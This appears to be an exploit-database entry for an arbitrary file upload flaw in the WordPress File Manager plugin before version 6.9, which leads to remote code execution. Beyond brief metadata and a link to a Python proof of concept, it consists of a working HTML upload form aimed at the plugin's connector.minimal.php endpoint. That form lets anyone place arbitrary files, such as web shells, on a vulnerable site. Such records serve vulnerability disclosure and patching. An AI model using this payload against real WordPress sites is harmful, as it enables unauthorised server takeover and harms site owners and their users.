File Manager < 6.9 - Arbitrary File Upload leading to RCE

2020-09-01T00:00:00
ID WPEX-ID:10389
Type wpexploit
Reporter Ville Korhonen
Modified 2020-10-05T00:00:00

Description

WordPress Vulnerability - File Manager < 6.9 - Arbitrary File Upload leading to RCE

                                        
https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php">
    <input type="hidden" name="cmd" value="upload"/>
    <input type="hidden" name="target" value="l1_Lw"/>
    <input type="file" name="upload[]"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>
</html>